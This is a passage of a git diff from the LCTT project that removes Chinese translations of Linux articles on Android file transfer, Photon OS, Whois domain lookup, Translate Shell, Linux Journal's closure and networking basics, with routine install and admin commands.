App](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/android-file-transfer-for-linux-750x662.jpg) + +app特点: + +*   简洁直观的用户界面 + +*   支持文件拖放功能(从Linux系统到手机) + +*   支持批量下载 (从手机到Linux系统) + +*   显示传输进程对话框 + +*   FUSE模块支持 + +*   没有文件大小限制 + +*   可选命令行工具 + +### Ubuntu下安装安卓手机文件助手的步骤 + +以上就是对这个应用的介绍,下面是如何安装它的具体步骤。 + +这有一个[PPA](个人软件包集)源为Ubuntu 14.04 LTS(长期支持版本),16.04LTS 和 Ubuntu17.10 提供可用应用 + +为了将这一PPA加入你的软件资源列表中,执行这条命令: + +``` +sudo add-apt-repository ppa:samoilov-lex/aftl-stable +``` + +接着,为了在Ubuntu下安装Linux版本的安卓文件传输助手,执行: + +``` +sudo apt-get update && sudo apt install android-file-transfer +``` + +这样就行了。 + +你会在你的应用列表中发现这一应用的启动图标。 + +在你启动这一应用之前,要确保没有其他应用(比如Nautilus)已经加载了你的手机.如果其他应用正在使用你的手机,就会显示“无法找到MTP设备”。为了解决这一问题,将你的手机从Nautilus(或者任何正在使用你的手机的应用)上移除,然后再重新启动安卓文件传输助手。 + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux + +作者:[ JOEY SNEDDON ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/app +[3]:http://www.omgubuntu.co.uk/category/download +[4]:https://github.com/whoozle/android-file-transfer-linux +[5]:http://www.omgubuntu.co.uk/2017/11/android-file-transfer-app-linux +[6]:http://android.com/filetransfer?linkid=14270770 +[7]:https://en.wikipedia.org/wiki/Media_Transfer_Protocol +[8]:https://en.wikipedia.org/wiki/GVfs +[9]:http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg +[10]:https://launchpad.net/~samoilov-lex/+archive/ubuntu/aftl-stable diff --git a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md deleted file mode 100644 index e51c580da9..0000000000 --- a/translated/tech/20171124 Photon Could Be Your New Favorite Container OS.md +++ /dev/null @@ -1,147 +0,0 @@ -Photon也许能成为你最喜爱的容器操作系统 -============================================================ - -![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") - -Phonton OS专注于容器,是一个非常出色的平台。 —— Jack Wallen - -容器在当下的火热,并不是没有原因的。正如[之前][13]讨论的,容器可以使您轻松快捷地将新的服务与应用部署到您的网络上,而且并不耗费太多的系统资源。比起专用硬件和虚拟机,容器都是更加划算的,除此之外,他们更容易更新与重用。 - -更重要的是,容器喜欢Linux(反之亦然)。不需要太多时间和麻烦,你就可以启动一台Linux服务器,运行[Docker][14],再是部署容器。但是,哪种Linux发行版最适合部署容器呢?我们的选择很多。你可以使用标准的Ubuntu服务器平台(更容易安装Docker并部署容器)或者是更轻量级的发行版 —— 专门用于部署容器。 - -[Photon][15]就是这样的一个发行版。这个特殊的版本是由[VMware][16]于2005年创建的,它包含了Docker的守护进程,并与容器框架(如Mesos和Kubernetes)一起使用。Photon经过优化可与[VMware vSphere][17]协同工作,而且可用于裸机,[Microsoft Azure][18], [Google Compute Engine][19], [Amazon Elastic Compute Cloud][20], 或者 [VirtualBox][21]等。 - -Photon通过只安装Docker守护进程所必需的东西来保持它的轻量。而这样做的结果是,这个发行版的大小大约只有300MB。但这足以让Linux的运行一切正常。除此之外,Photon的主要特点还有: - -* 内核调整为性能模式。 - -* 内核根据[内核自防护项目][6](KSPP)进行了加固。 - -* 所有安装的软件包都根据加固的安全标识来构建。 - -* 操作系统在信任验证后启动。 - -* Photon管理进程管理防火墙,网络,软件包,和远程登录在Photon机子上的用户。 - -* 支持持久卷。 - -* [Project Lightwave][7] 整合。 - -* 及时的安全补丁与更新。 - -Photon可以通过[ISO][22],[OVA][23],[Amazon Machine Image][24],[Google Compute Engine image][25]和[Azure VHD][26]安装使用。现在我将向您展示如何使用ISO镜像在VirtualBox上安装Photon。整个安装过程大概需要五分钟,在最后您将有一台随时可以部署容器的虚拟机。 - -### 创建虚拟机 - -在部署第一台容器之前,您必须先创建一台虚拟机并安装Photon。为此,打开VirtualBox并点击“新建”按钮。跟着创建虚拟机向导进行配置(根据您的容器将需要的用途,为Photon提供必要的资源)。在创建好虚拟机后,您所需要做的第一件事就是更改配置。选择新建的虚拟机(在VirtualBox主窗口的左侧面板中),然后单击“设置”。在弹出的窗口中,点击“网络”(在左侧的导航中)。 - -在“网络”窗口(图1)中,你需要在“连接”的下拉窗口中选择桥接。这可以确保您的Photon服务与您的网络相连。完成更改后,单击确定。 - -### [photon_0.jpg][8] - -![change settings](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_0.jpg?itok=Q0yhOhsZ "change setatings") -图 1: 更改Photon在VirtualBox中的网络设置。[经许可使用][1] - -从左侧的导航选择您的Photon虚拟机,点击启动。系统会提示您去加载IOS镜像。当您完成之后,Photon安装程序将会启动并提示您按回车后开始安装。安装过程基于ncurses(没有GUI),但它非常简单。 - -接下来(图2),系统会询问您是要最小化安装,完整安装还是安装OSTree服务器。我选择了完整安装。选择您所需要的任意选项,然后按回车继续。 - -### [photon_1.jpg][9] - -![installation type](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_2.jpg?itok=QL1Rs-PH "Photon") -图 2: 选择您的安装类型.[经许可使用][2] - -在下一个窗口,选择您要安装Photon的磁盘。由于我们将其安装在虚拟机,因此只有一块磁盘会被列出(图3)。选择“自动”按下回车。然后安装程序会让您输入(并验证)管理员密码。在这之后镜像开始安装在您的磁盘上并在不到5分钟的时间内结束。 - -### [photon_2.jpg][] - -![Photon](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_1.jpg?itok=OdnMVpaA "installation type") -图 3: 选择安装Photon的硬盘.[经许可使用][3] - -安装完成后,重启虚拟机并使用安装时创建的用户root和它的密码登录。一切就绪,你准备好开始工作了。 - -在开始使用Docker之前,您需要更新一下Photon。Photon使用 _yum_ 软件包管理器,因此在以root用户登录后输入命令 _yum update_。如果有任何可用更新,则会询问您是否确认(图4)。 - -### [photon_3.jpg][11] - -![Updating](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon_3.jpg?itok=vjqrspE2 "Updating") -图 4: 更新 Photon.[经许可使用][4] - -用法 - -正如我所说的,Photon提供了部署容器甚至创建Kubernetes集群所需要的所有包。但是,在使用之前还要做一些事情。首先要启动Docker守护进程。为此,执行以下命令: - -``` -systemctl start docker - -systemctl enable docker -``` - -现在我们需要创建一个标准用户,因此我们没有以root去运行docker命令。为此,执行以下命令: - -``` -useradd -m USERNAME - -passwd USERNAME -``` - -其中USERNAME是我们新增的用户的名称。 - -接下来,我们需要将这个新用户添加到 _docker_ 组,执行命令: - -``` -usermod -a -G docker USERNAME -``` - -其中USERNAME是刚刚创建的用户的名称。 - -注销root用户并切换为新增的用户。现在,您已经可以不必使用 _sudo_ 命令或者是切换到root用户来使用 _docker_命令了。从Docker Hub中取出一个镜像开始部署容器吧。 - -### 一个优秀的容器平台 - -在专注于容器方面,Photon毫无疑问是一个出色的平台。请注意,Photon是一个开源项目,因此没有任何付费支持。如果您对Photon有任何的问题,请移步Photon项目的Github下的[Issues][27],那里可以供您阅读相关问题,或者提交您的问题。如果您对Photon感兴趣,您也可以在项目的官方[Github][28]中找到源码。 - -尝试一下Photon吧,看看它是否能够使得Docker容器和Kubernetes集群的部署更加容易。 - -欲了解Linux的更多信息,可以通过学习Linux基金会和edX的免费课程,[“Linux 入门”][29]。 - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/11/photon-could-be-your-new-favorite-container-os - -作者:[JACK WALLEN][a] -译者:[KeyLD](https://github.com/KeyLd) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/jlwallen -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/used-permission -[3]:https://www.linux.com/licenses/category/used-permission -[4]:https://www.linux.com/licenses/category/used-permission -[5]:https://www.linux.com/licenses/category/creative-commons-zero -[6]:https://kernsec.org/wiki/index.php/Kernel_Self_Protection_Project -[7]:http://vmware.github.io/lightwave/ -[8]:https://www.linux.com/files/images/photon0jpg -[9]:https://www.linux.com/files/images/photon1jpg -[10]:https://www.linux.com/files/images/photon2jpg -[11]:https://www.linux.com/files/images/photon3jpg -[12]:https://www.linux.com/files/images/photon-linuxjpg -[13]:https://www.linux.com/learn/intro-to-linux/2017/11/how-install-and-use-docker-linux -[14]:https://www.docker.com/ -[15]:https://vmware.github.io/photon/ -[16]:https://www.vmware.com/ -[17]:https://www.vmware.com/products/vsphere.html -[18]:https://azure.microsoft.com/ -[19]:https://cloud.google.com/compute/ -[20]:https://aws.amazon.com/ec2/ -[21]:https://www.virtualbox.org/ -[22]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[23]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[24]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[25]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[26]:https://github.com/vmware/photon/wiki/Downloading-Photon-OS -[27]:https://github.com/vmware/photon/issues -[28]:https://github.com/vmware/photon -[29]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux diff --git a/translated/tech/20171130 New Feature Find every domain someone owns automatically.md b/translated/tech/20171130 New Feature Find every domain someone owns automatically.md deleted file mode 100644 index 4b72eaae5e..0000000000 --- a/translated/tech/20171130 New Feature Find every domain someone owns automatically.md +++ /dev/null @@ -1,49 +0,0 @@ -新功能:自动找出每个域名的拥有者 -============================================================ - - -今天,我们很高兴地宣布我们最近几周做的新功能。它是 Whois 聚合工具,现在可以在 [DNSTrails][1] 上获得。 - -在过去,查找一个域名的所有者会花费很多时间,因为大部分时间你都需要把域名指向一个 IP 地址,以便找到同一个人拥有的其他域名。 - -使用老的方法,你会很轻易地在一个工具和另外一个工具的研究和交叉比较结果中花费数个小时,直到得到你想要的域名。 - -感谢这个新工具和我们的智能[WHOIS 数据库][2],现在你可以搜索任何域名,并获得组织或个人注册的域名的完整列表,并在几秒钟内获得准确的结果。 - -### 我如何使用Whois聚合功能? - -第一步:打开 [DNSTrails.com][3] - -第二步:搜索任何域名,比如:godaddy.com - -第三步:在得到域名的结果后,如下所见,定位下面的 Whois 信息: - -![Domain name search results](https://securitytrails.com/images/a/a/1/3/f/aa13fa3616b8dc313f925bdbf1da43a54856d463-image1.png) - -第四步:你会看到那里有有关域名的电话和电子邮箱地址。 - -第五步:点击右边的链接,你会轻松地找到用相同电话和邮箱注册的域名。 - -![All domain names by the same owner](https://securitytrails.com/images/1/3/4/0/3/134037822d23db4907d421046b11f3cbb872f94f-image2.png) - -如果你正在调查互联网上任何个人的域名所有权,这意味着即使域名甚至没有指向注册服务商的 IP,如果他们使用相同的电话和邮件地址,我们仍然可以发现其他域名。 - -想知道一个人拥有的其他域名么?亲自试试 [DNStrails][5] 的[ WHOIS 聚合功能][4]或者[使用我们的 API 访问][6]。 - --------------------------------------------------------------------------------- - -via: https://securitytrails.com/blog/find-every-domain-someone-owns - -作者:[SECURITYTRAILS TEAM ][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://securitytrails.com/blog/find-every-domain-someone-owns -[1]:https://dnstrails.com/ -[2]:https://securitytrails.com/forensics -[3]:https://dnstrails.com/ -[4]:http://dnstrails.com/#/domain/domain/ueland.com -[5]:https://dnstrails.com/ -[6]:https://securitytrails.com/contact diff --git a/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md b/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md deleted file mode 100644 index 9f905bd496..0000000000 --- a/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md +++ /dev/null @@ -1,400 +0,0 @@ -Translate Shell: 一款在 Linux 命令行中使用 Google Translate的工具 -============================================================ - -我对 CLI 应用非常感兴趣,因此热衷于使用并分享 CLI 应用。 我之所以更喜欢 CLI 很大原因是因为我在大多数的时候都使用的是字符界面(black screen),已经习惯了使用 CLI 应用而不是 GUI 应用. - -我写过很多关于 CLI 应用的文章。 最近我发现了一些 google 的 CLI 工具,像 “Google Translator”, “Google Calendar”, 和 “Google Contacts”。 这里,我想在给大家分享一下。 - -今天我们要介绍的是 “Google Translator” 工具。 由于母语是泰米尔语,我在一天内用了很多次才理解了它的意义。 - -`Google translate` 为其他语系的人们所广泛使用。 - -### 什么是 Translate Shell - -[Translate Shell][2] (之前叫做 Google Translate CLI) 是一款借助 `Google Translate`(默认), `Bing Translator`, `Yandex.Translate` 以及 `Apertium` 来翻译的命令行翻译器。 -它让你可以在终端访问这些翻译引擎. `Translate Shell` 在大多数Linux发行版中都能使用。 - -### 如何安装 Translate Shell - -有三种方法安装 `Translate Shell`。 - -* 下载自包含的可执行文件 - -* 手工安装 - -* 通过包挂力气安装 - -#### 方法-1 : 下载自包含的可执行文件 - -下载自包含的可执行文件放到 `/usr/bin` 目录中。 - -```shell -$ wget git.io/trans -$ chmod +x ./trans -$ sudo mv trans /usr/bin/ -``` - -#### 方法-2 : 手工安装 - -克隆 `Translate Shell` github 仓库然后手工编译。 - -```shell -$ git clone https://github.com/soimort/translate-shell && cd translate-shell -$ make -$ sudo make install -``` - -#### 方法-3 : Via Package Manager - -有些发行版的官方仓库中包含了 `Translate Shell`,可以通过包管理器来安装。 - -对于 Debian/Ubuntu, 使用 [APT-GET Command][3] 或者 [APT Command][4]来安装。 - -```shell -$ sudo apt-get install translate-shell -``` - -对于 Fedora, 使用 [DNF Command][5] 来安装。 - -```shell -$ sudo dnf install translate-shell -``` - -对于基于 Arch Linux 的系统, 使用 [Yaourt Command][6] 或 [Packer Command][7] 来从 AUR 仓库中安装。 - -```shell -$ yaourt -S translate-shell -or -$ packer -S translate-shell -``` - -### 如何使用 Translate Shell - -安装好后,打开终端闭关输入下面命令。 `Google Translate` 会自动探测源文本是哪种语言,并且在默认情况下将之翻译成你的 `locale` 所对应的语言。 - -``` -$ trans [Words] -``` - -下面我将泰米尔语中的单词 “நன்றி” (Nanri) 翻译成英语。 这个单词的意思是感谢别人。 - -``` -$ trans நன்றி -நன்றி -(Naṉṟi) - -Thanks - -Definitions of நன்றி -[ தமிழ் -> English ] - -noun - gratitude - நன்றி - thanks - நன்றி - -நன்றி - Thanks -``` - -使用下面命令也能将英语翻译成泰米尔语。 - -``` -$ trans :ta thanks -thanks -/THaNGks/ - -நன்றி -(Naṉṟi) - -Definitions of thanks -[ English -> தமிழ் ] - -noun - நன்றி - gratitude, thanks - -thanks - நன்றி -``` - -要将一个单词翻译到多个语种可以使用下面命令(本例中, 我将单词翻译成泰米尔语以及印地语)。 - -``` -$ trans :ta+hi thanks -thanks -/THaNGks/ - -நன்றி -(Naṉṟi) - -Definitions of thanks -[ English -> தமிழ் ] - -noun - நன்றி - gratitude, thanks - -thanks - நன்றி - -thanks -/THaNGks/ - -धन्यवाद -(dhanyavaad) - -Definitions of thanks -[ English -> हिन्दी ] - -noun - धन्यवाद - thanks, thank, gratitude, thankfulness, felicitation - -thanks - धन्यवाद, शुक्रिया -``` - -使用下面命令可以将多个单词当成一个参数(句子)来进行翻译。(只需要把句子应用起来作为一个参数就行了)。 - -``` -$ trans :ta "what is going on your life?" -what is going on your life? - -உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? -(Uṅkaḷ vāḻkkaiyil eṉṉa naṭakkiṟatu?) - -Translations of what is going on your life? -[ English -> தமிழ் ] - -what is going on your life? - உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? -``` - -下面命令独立地翻译各个单词。 - -``` -$ trans :ta curios happy -curios - -ஆர்வம் -(Ārvam) - -Translations of curios -[ Română -> தமிழ் ] - -curios - ஆர்வம், அறிவாளிகள், ஆர்வமுள்ள, அறிய, ஆர்வமாக -happy -/ˈhapē/ - -சந்தோஷமாக -(Cantōṣamāka) - -Definitions of happy -[ English -> தமிழ் ] - - மகிழ்ச்சியான - happy, convivial, debonair, gay - திருப்தி உடைய - happy - -adjective - இன்பமான - happy - -happy - சந்தோஷமாக, மகிழ்ச்சி, இனிய, சந்தோஷமா -``` - -简洁模式: 默认情况下,`Translate Shell` 尽可能多的显示翻译信息. 如果你希望只显示简要信息,只需要加上`-b`选项。 - -``` -$ trans -b :ta thanks -நன்றி -``` - -字典模式: 加上 `-d` 可以把 `Translate Shell` 当成字典来用. - -``` -$ trans -d :en thanks -thanks -/THaNGks/ - -Synonyms - noun - - gratitude, appreciation, acknowledgment, recognition, credit - - exclamation - - thank you, many thanks, thanks very much, thanks a lot, thank you kindly, much obliged, much appreciated, bless you, thanks a million - -Examples - - In short, thanks for everything that makes this city great this Thanksgiving. - - - many thanks - - - There were no thanks in the letter from him, just complaints and accusations. - - - It is a joyful celebration in which Bolivians give thanks for their freedom as a nation. - - - festivals were held to give thanks for the harvest - - - The collection, as usual, received a great response and thanks is extended to all who subscribed. - - - It would be easy to dwell on the animals that Tasmania has lost, but I prefer to give thanks for what remains. - - - thanks for being so helpful - - - It came back on about half an hour earlier than predicted, so I suppose I can give thanks for that. - - - Many thanks for the reply but as much as I tried to follow your advice, it's been a bad week. - - - To them and to those who have supported the office I extend my grateful thanks . - - - We can give thanks and words of appreciation to others for their kind deeds done to us. - - - Adam, thanks for taking time out of your very busy schedule to be with us tonight. - - - a letter of thanks - - - Thank you very much for wanting to go on reading, and thanks for your understanding. - - - Gerry has received a letter of thanks from the charity for his part in helping to raise this much needed cash. - - - So thanks for your reply to that guy who seemed to have a chip on his shoulder about it. - - - Suzanne, thanks for being so supportive with your comments on my blog. - - - She has never once acknowledged my thanks , or existence for that matter. - - - My grateful thanks go to the funders who made it possible for me to travel. - - - festivals were held to give thanks for the harvest - - - All you secretaries who made it this far into the article… thanks for your patience. - - - So, even though I don't think the photos are that good, thanks for the compliments! - - - And thanks for warning us that your secret service requires a motorcade of more than 35 cars. - - - Many thanks for your advice, which as you can see, I have passed on to our readers. - - - Tom Ryan was given a bottle of wine as a thanks for his active involvement in the twinning project. - - - Mr Hill insists he has received no recent complaints and has even been sent a letter of thanks from the forum. - - - Hundreds turned out to pay tribute to a beloved former headteacher at a memorial service to give thanks for her life. - - - Again, thanks for a well written and much deserved tribute to our good friend George. - - - I appreciate your doing so, and thanks also for the compliments about the photos! - -See also - Thanks!, thank, many thanks, thanks to, thanks to you, special thanks, give thanks, thousand thanks, Many thanks!, render thanks, heartfelt thanks, thanks to this -``` - -使用下面格式可以使用 `Translate Shell` 来翻译文件。 - -```shell -$ trans :ta file:///home/magi/gtrans.txt -உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? -``` - -下面命令可以让 `Translate Shell` 进入交互模式. 在进入交互模式之前你需要明确指定源语言和目标语言。本例中,我将英文单词翻译成泰米尔语。 - -``` -$ trans -shell en:ta thanks -Translate Shell -(:q to quit) -thanks -/THaNGks/ - -நன்றி -(Naṉṟi) - -Definitions of thanks -[ English -> தமிழ் ] - -noun - நன்றி - gratitude, thanks - -thanks - நன்றி -``` - -想知道语言代码,可以执行下面语言。 - -```shell -$ trans -R -``` -或者 -```shell -$ trans -T -┌───────────────────────┬───────────────────────┬───────────────────────┐ -│ Afrikaans - af │ Hindi - hi │ Punjabi - pa │ -│ Albanian - sq │ Hmong - hmn │ Querétaro Otomi- otq │ -│ Amharic - am │ Hmong Daw - mww │ Romanian - ro │ -│ Arabic - ar │ Hungarian - hu │ Russian - ru │ -│ Armenian - hy │ Icelandic - is │ Samoan - sm │ -│ Azerbaijani - az │ Igbo - ig │ Scots Gaelic - gd │ -│ Basque - eu │ Indonesian - id │ Serbian (Cyr...-sr-Cyrl -│ Belarusian - be │ Irish - ga │ Serbian (Latin)-sr-Latn -│ Bengali - bn │ Italian - it │ Sesotho - st │ -│ Bosnian - bs │ Japanese - ja │ Shona - sn │ -│ Bulgarian - bg │ Javanese - jv │ Sindhi - sd │ -│ Cantonese - yue │ Kannada - kn │ Sinhala - si │ -│ Catalan - ca │ Kazakh - kk │ Slovak - sk │ -│ Cebuano - ceb │ Khmer - km │ Slovenian - sl │ -│ Chichewa - ny │ Klingon - tlh │ Somali - so │ -│ Chinese Simp...- zh-CN│ Klingon (pIqaD)tlh-Qaak Spanish - es │ -│ Chinese Trad...- zh-TW│ Korean - ko │ Sundanese - su │ -│ Corsican - co │ Kurdish - ku │ Swahili - sw │ -│ Croatian - hr │ Kyrgyz - ky │ Swedish - sv │ -│ Czech - cs │ Lao - lo │ Tahitian - ty │ -│ Danish - da │ Latin - la │ Tajik - tg │ -│ Dutch - nl │ Latvian - lv │ Tamil - ta │ -│ English - en │ Lithuanian - lt │ Tatar - tt │ -│ Esperanto - eo │ Luxembourgish - lb │ Telugu - te │ -│ Estonian - et │ Macedonian - mk │ Thai - th │ -│ Fijian - fj │ Malagasy - mg │ Tongan - to │ -│ Filipino - tl │ Malay - ms │ Turkish - tr │ -│ Finnish - fi │ Malayalam - ml │ Udmurt - udm │ -│ French - fr │ Maltese - mt │ Ukrainian - uk │ -│ Frisian - fy │ Maori - mi │ Urdu - ur │ -│ Galician - gl │ Marathi - mr │ Uzbek - uz │ -│ Georgian - ka │ Mongolian - mn │ Vietnamese - vi │ -│ German - de │ Myanmar - my │ Welsh - cy │ -│ Greek - el │ Nepali - ne │ Xhosa - xh │ -│ Gujarati - gu │ Norwegian - no │ Yiddish - yi │ -│ Haitian Creole - ht │ Pashto - ps │ Yoruba - yo │ -│ Hausa - ha │ Persian - fa │ Yucatec Maya - yua │ -│ Hawaiian - haw │ Polish - pl │ Zulu - zu │ -│ Hebrew - he │ Portuguese - pt │ │ -└───────────────────────┴───────────────────────┴───────────────────────┘ -``` - -想了解更多选项的内容,可以查看 `man` 页. - -```shell -$ man trans -``` - --------------------------------------------------------------------------------- - -via: https://www.2daygeek.com/translate-shell-a-tool-to-use-google-translate-from-command-line-in-linux/ - -作者:[Magesh Maruthamuthu][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.2daygeek.com/author/magesh/ -[2]:https://github.com/soimort/translate-shell -[3]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/ -[4]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/ -[5]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/ -[6]:https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/ -[7]:https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/ diff --git a/translated/tech/20171201 Linux Journal Ceases Publication.md b/translated/tech/20171201 Linux Journal Ceases Publication.md deleted file mode 100644 index 2eb5c82f51..0000000000 --- a/translated/tech/20171201 Linux Journal Ceases Publication.md +++ /dev/null @@ -1,34 +0,0 @@ -Linux Journal 停止发行 -============================================================ - -EOF - -伙计们,看起来我们要到终点了。如果按照计划而且没有什么其他的话,十一月份的 Linux Journal 将是我们的最后一期。 - -简单的事实是,我们已经用完了钱和期权。我们从来没有一个富有的母公司或者自己深厚的资金,从开始到结束,这使得我们变成一个反常的出版商。虽然我们在很长的一段时间内运营着,但当天平不可恢复地最终向相反方向倾斜时,我们在十一月份失去了最后一点支持。 - -虽然我们像看到出版业的过去那样看到出版业的未来 - 广告商赞助出版物的时代,因为他们重视品牌和读者 - 我们如今的广告宁愿追逐眼球,最好是在读者的浏览器中植入跟踪标记,并随时随地展示那些广告。但是,未来不是这样,过去的已经过去了。 - -我们猜想,有一个希望,那就是救世主可能会会来。但除了我们的品牌、我们的档案,我们的域名、我们的用户和读者之外,还必须是愿意承担我们一部分债务的人。如果你认识任何人能够提供认真的报价,请告诉我们。不然,请观看 LinuxJournal.com,并希望至少我们的遗留归档(可以追溯到 Linux Journal 诞生的 1994 年 4 月,当 Linux 命中 1.0 发布时)将不会消失。这里有很多很棒的东西,还有很多我们会痛恨世界失去的历史。 - -我们最大的遗憾是,我们甚至没有足够的钱回馈最看重我们的人:我们的用户。为此,我们不能更深刻或真诚地道歉。我们对订阅者而言有什么: - -Linux Pro Magazine 为我们的用户提供了六本免费的杂志,我们在 Linux Journal 上一直赞叹这点。在我们需要的时候,他们是我们的第一批人,我们感谢他们的恩惠。我们今天刚刚完成了我们的 2017 年归档,其中包括我们曾经发表过的每一个问题,包括第一个和最后一个。通常我们以 25 美元的价格出售,但显然用户将免费获得。订阅者请注意有关两者的详细信息的电子邮件。 - -我们也希望在知道我们非常非常努力地让 Linux Journal 进行下去后能有一些安慰 ,而且我们已经用最精益、小的可能运营了很长一段时间。我们是一个大多数是自愿者的组织,有些员工已经几个月没有收到工资。我们还欠钱给自由职业者。这时一个限制发行商能够维持多长时间的限制,现在这个限制已经到头了。 - -伙计们,这是一个伟大的运营。乡亲。对每一个为我们的诞生、我们的成功和我们多年的坚持作出贡献的人致敬。我们列了一份名单,但是列表太长了,并且漏掉有价值的人的风险很高。你知道你是谁。我们再次感谢。 - --------------------------------------------------------------------------------- - -via: https://www.linuxjournal.com/content/linux-journal-ceases-publication - -作者:[ Carlie Fairchild][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxjournal.com/users/carlie-fairchild -[1]:https://www.linuxjournal.com/taxonomy/term/29 -[2]:https://www.linuxjournal.com/users/carlie-fairchild diff --git a/translated/tech/Linux Networking Hardware for Beginners: Think Software b/translated/tech/Linux Networking Hardware for Beginners: Think Software deleted file mode 100644 index a236a80e97..0000000000 --- a/translated/tech/Linux Networking Hardware for Beginners: Think Software +++ /dev/null @@ -1,89 +0,0 @@ -Translating by FelixYFZ - -面向初学者的Linux网络硬件: 软件工程思想 -============================================================ - -![island network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/soderskar-island.jpg?itok=wiMaF66b "island network") - 没有路由和桥接,我们将会成为孤独的小岛,你将会在这个网络教程中学到更多知识。 -Commons Zero][3]Pixabay - - 上周,我们学习了本地网络硬件知识,本周,我们将学习网络互联技术和在移动网络中的一些很酷的黑客技术。 -### Routers:路由器 - - -网络路由器就是计算机网络中的一切,因为路由器连接着网络,没有路由器,我们就会成为孤岛, - -图一展示了一个简单的有线本地网络和一个无线接入点,所有设备都接入到Internet上,本地局域网的计算机连接到一个连接着防火墙或者路由器的以太网交换机上,防火墙或者路由器连接到网络服务供应商提供的电缆箱,调制调节器,卫星上行系统...好像一切都在计算中,就像是一个带着不停闪烁的的小灯的盒子,当你的网络数据包离开你的局域网,进入广阔的互联网,它们穿过一个又一个路由器直到到达自己的目的地。 - - -### [fig-1.png][4] - -![simple LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_7.png?itok=lsazmf3- "simple LAN") - -图一:一个简单的有线局域网和一个无线接入点。 - -一台路由器能连接一切,一个小巧特殊的小盒子只专注于路由,一个大点的盒子将会提供路由,防火墙,域名服务,以及VPN网关功能,一台重新设计的台式电脑或者笔记本,一个树莓派计算机或者一个小模块,体积臃肿矮小的像PC这样的单板计算机,除了苛刻的用途以外,普通的商品硬件都能良好的工作运行。高端的路由器使用特殊设计的硬件每秒能够传输最大量的数据包。 它们有多路数据总线,多个中央处理器和极快的存储。 -可以通过查阅Juniper和思科的路由器来感受一下高端路由器书什么样子的,而且能看看里面是什么样的构造。 -一个接入你的局域网的无线接入点要么作为一个以太网网桥要么作为一个路由器。一个桥接器扩展了这个网络,所以在这个桥接器上的任意一端口上的主机都连接在同一个网络中。 -一台路由器连接的是两个不同的网络。 -### Network Topology:网络拓扑 - - -有多种设置你的局域网的方式,你可以把所有主机接入到一个单独的平面网络,如果你的交换机支持的话,你也可以把它们分配到不同的子网中。 -平面网络是最简单的网络,只需把每一台设备接入到同一个交换机上即可,如果一台交换上的端口不够使用,你可以将更多的交换机连接在一起。 -有些交换机有特殊的上行端口,有些是没有这种特殊限制的上行端口,你可以连接其中的任意端口,你可能需要使用交叉类型的以太网线,所以你要查阅你的交换机的说明文档来设置。平面网络是最容易管理的,你不需要路由器也不需要计算子网,但它也有一些缺点。他们的伸缩性不好,所以当网络规模变得越来越大的时候就会被广播网络所阻塞。 -将你的局域网进行分段将会提升安全保障, 把局域网分成可管理的不同网段将有助于管理更大的网络。 - 图2展示了一个分成两个子网的局域网络:内部的有线和无线主机,和非军事区域(从来不知道所所有的工作上的男性术语都是在计算机上键入的?)因为他被阻挡了所有的内部网络的访问。 - - -### [fig-2.png][5] - -![LAN](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_4.png?itok=LpXq7bLf "LAN") - -图2:一个分成两个子网的简单局域网。 -即使像图2那样的小型网络也可以有不同的配置方法。你可以将防火墙和路由器放置在一台单独的设备上。 